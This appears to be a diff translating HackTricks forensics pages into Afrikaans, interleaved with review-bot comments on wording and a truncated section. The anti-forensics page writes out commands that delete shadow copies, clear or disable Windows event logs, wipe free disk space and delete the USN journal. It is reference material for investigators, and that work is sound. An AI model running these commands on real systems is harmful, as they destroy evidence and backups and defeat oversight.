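Review bot: the sentence under "Inspekteer 'n Beeld" keeps English verb placement and is not grammatical Afrikaans: "kan jy begin **analiseer die partisies, lêerstelsel** wat gebruik word en **herwin** potensieel **interessante lêers**". Suggest "kan jy begin om die **partisies en die gebruikte lêerstelsel te analiseer** en potensieel **interessante lêers te herwin** (selfs uitgeveede lêers)". Two smaller consistency points in the same hunk: "malware-analise tegnieke" should be written as one compound ("malware-analise-tegnieke"), and "uitgewisde" for deleted files differs from "uitgevee", which the anti-forensics page in this commit uses for the same English word; use one term.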
@ -48,42 +48,42 @@ Depending on the used OSs and even platform different interesting artifacts shou
|
|||
[docker-forensics.md](docker-forensics.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Deep inspection of specific file-types and Software
|
||||
## Diep inspeksie van spesifieke lêertipes en sagteware
|
||||
|
||||
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
|
||||
Read the following page to learn some interesting tricks:
|
||||
As jy 'n baie **verdagte lêer** het, dan kan verskeie **truuks** nuttig wees, afhangende van die lêertipe en sagteware wat dit geskep het.\
|
||||
Lees die volgende bladsy om 'n paar interessante truuks te leer:
|
||||
|
||||
{% content-ref url="specific-software-file-type-tricks/" %}
|
||||
[specific-software-file-type-tricks](specific-software-file-type-tricks/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
I want to do a special mention to the page:
|
||||
Ek wil 'n spesiale vermelding maak van die bladsy:
|
||||
|
||||
{% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %}
|
||||
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Memory Dump Inspection
|
||||
## Geheue-uitstorting-inspeksie
|
||||
|
||||
{% content-ref url="memory-dump-analysis/" %}
|
||||
[memory-dump-analysis](memory-dump-analysis/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Pcap Inspection
|
||||
## Pcap-inspeksie
|
||||
|
||||
{% content-ref url="pcap-inspection/" %}
|
||||
[pcap-inspection](pcap-inspection/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## **Anti-Forensic Techniques**
|
||||
## **Anti-Forensiese Tegnieke**
|
||||
|
||||
Keep in mind the possible use of anti-forensic techniques:
|
||||
Hou moontlike gebruik van anti-forensiese tegnieke in gedagte:
|
||||
|
||||
{% content-ref url="anti-forensic-techniques.md" %}
|
||||
[anti-forensic-techniques.md](anti-forensic-techniques.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Threat Hunting
|
||||
## Bedreigingsjag
|
||||
|
||||
{% content-ref url="file-integrity-monitoring.md" %}
|
||||
[file-integrity-monitoring.md](file-integrity-monitoring.md)
|
||||
|
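Review bot: the heading "Geheue-uitstorting-inspeksie" is a literal rendering of "Memory Dump Inspection" that readers will not recognise, and it clashes with "geheuebeeld", the term the first hunk of this file uses for a memory image; "Geheuedump-inspeksie" (keeping "dump" as the loanword, which is what the linked page name memory-dump-analysis uses) would be consistent. Also "Diep inspeksie" reads better as "Diepgaande inspeksie", and the translated sentence "dan kan verskeie **truuks** nuttig wees, afhangende van die lêertipe en sagteware wat dit geskep het" drops the bold the source puts on "depending on the file-type and software"; carry the emphasis over or drop it in the source too.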
@ -91,12 +91,12 @@ Keep in mind the possible use of anti-forensic techniques:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,181 +1,173 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Timestamps
|
||||
# Tydstempels
|
||||
|
||||
An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
|
||||
It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`.
|
||||
'n Aanvaller mag belangstel om die tydstempels van lêers te **verander** om opsporing te vermy.\
|
||||
Dit is moontlik om die tydstempels binne die MFT in eienskappe `$STANDARD_INFORMATION` __ en __ `$FILE_NAME` te vind.
|
||||
|
||||
Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).
|
||||
Beide eienskappe het 4 tydstempels: **Wysiging**, **toegang**, **skepping**, en **MFT-registervoortgangswysiging** (MACE of MACB).
|
||||
|
||||
**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
|
||||
**Windows verkenner** en ander gereedskap wys die inligting vanaf **`$STANDARD_INFORMATION`**.
|
||||
|
||||
## TimeStomp - Anti-forensic Tool
|
||||
## TimeStomp - Anti-forensiese Gereedskap
|
||||
|
||||
This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
|
||||
Hierdie gereedskap **verander** die tydstempelinligting binne **`$STANDARD_INFORMATION`** **maar nie** die inligting binne **`$FILE_NAME`** nie. Daarom is dit moontlik om **verdagte aktiwiteit te identifiseer**.
|
||||
|
||||
## Usnjrnl
|
||||
|
||||
The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes.
|
||||
Die **USN Joernaal** (Update Sequence Number Journal) is 'n kenmerk van die NTFS (Windows NT-lêersisteem) wat volume-veranderinge byhou. Die [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) gereedskap maak dit moontlik om hierdie veranderinge te ondersoek.
|
||||
|
||||
![](<../../.gitbook/assets/image (449).png>)
|
||||
|
||||
The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
|
||||
Die vorige prentjie is die **uitset** wat deur die **gereedskap** gewys word waar dit waargeneem kan word dat sommige **veranderinge aan die lêer uitgevoer is**.
|
||||
|
||||
## $LogFile
|
||||
|
||||
**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes.
|
||||
**Alle metadata-veranderinge aan 'n lêersisteem word gelog** in 'n proses wat bekend staan as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Die gelogde metadata word in 'n lêer genaamd `**$LogFile**` gehou, wat in die hoofgids van 'n NTFS-lêersisteem geleë is. Gereedskap soos [LogFileParser](https://github.com/jschicht/LogFileParser) kan gebruik word om hierdie lêer te ontled en veranderinge te identifiseer.
|
||||
|
||||
![](<../../.gitbook/assets/image (450).png>)
|
||||
|
||||
Again, in the output of the tool it's possible to see that **some changes were performed**.
|
||||
Weereens, in die uitset van die gereedskap is dit moontlik om te sien dat **sommige veranderinge uitgevoer is**.
|
||||
|
||||
Using the same tool it's possible to identify to **which time the timestamps were modified**:
|
||||
Met dieselfde gereedskap is dit moontlik om te identifiseer **watter tyd die tydstempels verander is**:
|
||||
|
||||
![](<../../.gitbook/assets/image (451).png>)
|
||||
|
||||
* CTIME: File's creation time
|
||||
* ATIME: File's modification time
|
||||
* MTIME: File's MFT registry modification
|
||||
* RTIME: File's access time
|
||||
* CTIME: Lêer se skeppingstyd
|
||||
* ATIME: Lêer se wysigingstyd
|
||||
* MTIME: Lêer se MFT-registervoortgangswysiging
|
||||
* RTIME: Lêer se toegangstyd
|
||||
|
||||
## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
|
||||
## Vergelyking van `$STANDARD_INFORMATION` en `$FILE_NAME`
|
||||
|
||||
Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**.
|
||||
'n Ander manier om verdagte gewysigde lêers te identifiseer, sou wees om die tyd in beide eienskappe te vergelyk en te soek na **verskille**.
|
||||
|
||||
## Nanoseconds
|
||||
## Nanosekondes
|
||||
|
||||
**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
|
||||
**NTFS**-tydstempels het 'n **presisie** van **100 nanosekondes**. Om dan lêers met tydstempels soos 2010-10-10 10:10:**00.000:0000 te vind, is baie verdag**.
|
||||
|
||||
## SetMace - Anti-forensic Tool
|
||||
## SetMace - Anti-forensiese Gereedskap
|
||||
|
||||
This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information.
|
||||
Hierdie gereedskap kan beide eienskappe `$STARNDAR_INFORMATION` en `$FILE_NAME` verander. Vanaf Windows Vista is dit egter nodig vir 'n lewendige bedryfstelsel om hierdie inligting te verander.
|
||||
|
||||
# Data Hiding
|
||||
# Data Versteek
|
||||
|
||||
NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**.
|
||||
NFTS gebruik 'n groep en die minimum inligtingsgrootte. Dit beteken dat as 'n lêer 'n groep en 'n half gebruik, sal die **oorskietende helfte nooit gebruik word nie** totdat die lêer uitgevee word. Dit is dan moontlik om data in hierdie "verborge" spasie te **versteek**.
|
||||
|
||||
There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added:
|
||||
Daar is gereedskap soos slacker wat dit moontlik maak om data in hierdie "verborge" spasie te versteek. 'n Ontleding van die `$logfile` en `$usnjrnl` kan egter wys dat daar data bygevoeg is:
|
||||
|
||||
![](<../../.gitbook/assets/image (452).png>)
|
||||
|
||||
Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
|
||||
Dit is dan moontlik om die spasie te herwin deur gereedskap soos FTK Imager te gebruik. Let daarop dat hierdie soort gereedskap die inhoud geobskureer of selfs versleutel kan stoor.
|
||||
|
||||
# UsbKill
|
||||
|
||||
This is a tool that will **turn off the computer if any change in the USB** ports is detected.\
|
||||
A way to discover this would be to inspect the running processes and **review each python script running**.
|
||||
Dit is 'n gereedskap wat die rekenaar sal **afskakel as enige verandering in die USB-poorte** opgespoor word.\
|
||||
'n Manier om dit te ontdek sou wees om die lopende prosesse te ondersoek en **elke python-skripsie wat loop te hersien**.
|
||||
|
||||
# Live Linux Distributions
|
||||
# Lewende Linux-verspreidings
|
||||
|
||||
These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
|
||||
Hierdie verspreidings word **uitgevoer binne die RAM-geheue**. Die enigste manier om hulle op te spoor is **as die NTFS-lêersisteem met skryfregte aangeheg is**. As dit net met leesregte aangeheg is, sal dit nie moontlik wees om die indringing op te spoor nie.
|
||||
|
||||
# Secure Deletion
|
||||
# Veilige Skrapping
|
||||
|
||||
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
|
||||
|
||||
# Windows Configuration
|
||||
# Windows-konfigurasie
|
||||
|
||||
It's possible to disable several windows logging methods to make the forensics investigation much harder.
|
||||
Dit is moontlik om verskeie Windows-loggingsmetodes uit te skakel om die forensiese ondersoek baie moeiliker te maak.
|
||||
|
||||
## Disable Timestamps - UserAssist
|
||||
## Skakel Tydstempels Af - UserAssist
|
||||
|
||||
This is a registry key that maintains dates and hours when each executable was run by the user.
|
||||
Dit is 'n registerleutel wat datums en ure behou wanneer elke uitvoerbare lêer deur die gebruiker uitgevoer is.
|
||||
|
||||
Disabling UserAssist requires two steps:
|
||||
Om UserAssist uit te skakel, is twee stappe nodig:
|
||||
|
||||
1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
|
||||
2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
|
||||
1. Stel twee registerleutels, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` en `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, beide op nul om aan te dui dat ons UserAssist wil uitskakel.
|
||||
2. Wis jou register-subbome wat lyk soos `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
|
||||
|
||||
## Disable Timestamps - Prefetch
|
||||
## Skakel Tydstempels Af - Prefetch
|
||||
|
||||
This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
|
||||
Dit sal inligting oor die uitgevoerde toepassings stoor met die doel om die prestasie van die Windows-stelsel te verbeter. Dit kan egter ook nuttig wees vir forensiese praktyke.
|
||||
|
||||
* Execute `regedit`
|
||||
* Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
|
||||
* Right-click on both `EnablePrefetcher` and `EnableSuperfetch`
|
||||
* Select Modify on each of these to change the value from 1 (or 3) to 0
|
||||
* Restart
|
||||
* Voer `regedit` uit
|
||||
* Kies die lêerpad `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
|
||||
* Regskliek op beide `EnablePrefetcher` en `EnableSuperfetch`
|
||||
* Kies Wysig op elkeen van hierdie om die waarde van 1 (of 3) na 0 te verander
|
||||
* Herlaai
|
||||
|
||||
## Disable Timestamps - Last Access Time
|
||||
## Skakel Tydstempels Af - Laaste Toegangstyd
|
||||
|
||||
Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
|
||||
Telkens wanneer 'n gids vanaf 'n NTFS-volume op 'n Windows NT-bediener geopen word, neem die stelsel die tyd om 'n tydstempelveld op elke gelysde gids op te dateer, genaamd die laaste toegangstyd. Op 'n baie gebruikte NTFS-volume kan dit die prestasie beïnvloed.
|
||||
|
||||
1. Open the Registry Editor (Regedit.exe).
|
||||
2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
|
||||
3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process.
|
||||
4. Close the Registry Editor, and reboot the server.
|
||||
1. Maak die Registerredigeerder (Regedit
|
||||
## Verwyder USB Geskiedenis
|
||||
|
||||
## Delete USB History
|
||||
Al die **USB-toestelinskrywings** word gestoor in die Windows-registreerder onder die **USBSTOR**-registreersleutel wat sub-sleutels bevat wat geskep word wanneer jy 'n USB-toestel in jou rekenaar of draagbare rekenaar steek. Jy kan hierdie sleutel vind by H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deur dit te verwyder**, sal jy die USB-geskiedenis verwyder.\
|
||||
Jy kan ook die hulpmiddel [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) gebruik om seker te maak dat jy hulle verwyder het (en om hulle te verwyder).
|
||||
|
||||
All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
|
||||
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
|
||||
'n Ander lêer wat inligting oor die USB's stoor, is die lêer `setupapi.dev.log` binne `C:\Windows\INF`. Dit moet ook verwyder word.
|
||||
|
||||
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
|
||||
## Deaktiveer Skaduwee Kopieë
|
||||
|
||||
## Disable Shadow Copies
|
||||
**Lys** skaduwee kopieë met `vssadmin list shadowstorage`\
|
||||
**Verwyder** hulle deur `vssadmin delete shadow` uit te voer
|
||||
|
||||
**List** shadow copies with `vssadmin list shadowstorage`\
|
||||
**Delete** them running `vssadmin delete shadow`
|
||||
Jy kan hulle ook via die GUI verwyder deur die stappe te volg wat voorgestel word in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
|
||||
|
||||
You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
|
||||
Om skaduwee kopieë te deaktiveer [stappe vanaf hier](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
|
||||
To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
1. Maak die Dienste-program oop deur "dienste" in die tekssoekkasie in te tik nadat jy op die Windows-beginknoppie geklik het.
|
||||
2. Vind "Volume Shadow Copy" in die lys, kies dit, en kry toegang tot Eienskappe deur regs te klik.
|
||||
3. Kies "Gedeaktiveer" uit die "Beginsoort" keuselys, en bevestig dan die verandering deur op Toepas en OK te klik.
|
||||
|
||||
1. Open the Services program by typing "services" into the text search box after clicking the Windows start button.
|
||||
2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking.
|
||||
3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK.
|
||||
Dit is ook moontlik om die konfigurasie te wysig van watter lêers in die skaduwee kopie gekopieer gaan word in die register `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
|
||||
|
||||
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
|
||||
## Oorskryf verwyderde lêers
|
||||
|
||||
## Overwrite deleted files
|
||||
* Jy kan 'n **Windows-hulpmiddel** gebruik: `cipher /w:C` Dit sal cipher aandui om enige data van die beskikbare ongebruikte skyfspasie binne die C-aandryf te verwyder.
|
||||
* Jy kan ook hulpmiddels soos [**Eraser**](https://eraser.heidi.ie) gebruik
|
||||
|
||||
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
|
||||
* You can also use tools like [**Eraser**](https://eraser.heidi.ie)
|
||||
## Verwyder Windows-gebeurtenislogboeke
|
||||
|
||||
## Delete Windows event logs
|
||||
|
||||
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
|
||||
* Windows + R --> eventvwr.msc --> Brei "Windows-logboeke" uit --> Regskliek op elke kategorie en kies "Logboek skoonmaak"
|
||||
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
||||
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
||||
|
||||
## Disable Windows event logs
|
||||
## Deaktiveer Windows-gebeurtenislogboeke
|
||||
|
||||
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
||||
* Inside the services section disable the service "Windows Event Log"
|
||||
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
|
||||
* Deaktiveer die diens "Windows Event Log" binne die dienste-afdeling
|
||||
* `WEvtUtil.exec clear-log` of `WEvtUtil.exe cl`
|
||||
|
||||
## Disable $UsnJrnl
|
||||
## Deaktiveer $UsnJrnl
|
||||
|
||||
* `fsutil usn deletejournal /d c:`
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
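Review bot: the translation of "Disable Timestamps - Last Access Time" is truncated and loses content: the added side stops at "1. Maak die Registerredigeerder (Regedit" and the remaining steps (browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`, add the `NtfsDisableLastAccessUpdate` DWORD set to 1, reboot) are removed without a translated replacement, which is also why the hunk shrinks from 181 to 173 lines. Restore those steps before merging. Several defects of the English source are carried over verbatim and should be fixed while these lines are being rewritten: the stray markdown residue in "`$STANDARD_INFORMATION` __ en __ `$FILE_NAME`", the typo `$STARNDAR_INFORMATION` (should be `$STANDARD_INFORMATION`), "NFTS" for NTFS, the misplaced backtick in "H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`", and `WEvtUtil.exec clear-log` (should be `WEvtUtil.exe clear-log`). The timestamp legend under the $LogFile screenshot also contradicts the MACE expansion given earlier in the same file: it labels ATIME as modification time and MTIME as the MFT record change, whereas in MACE the M is modification, A is access, C is creation and E is the MFT entry, so the legend should read CTIME creation, ATIME access, MTIME modification, RTIME MFT record change. On the translation itself: "MFT-registervoortgangswysiging" (used twice) is not a meaningful rendering of "MFT entry modification"; "MFT-inskrywingswysiging" is. And "slack space" is translated away as '"verborge" spasie', so the following sentence about slacker now says the same thing twice; keep the technical term ("slack-spasie" or "slack space") so readers can look it up.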
@ -1,31 +1,28 @@
|
|||
# Docker Forensics
|
||||
# Docker Forensika
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
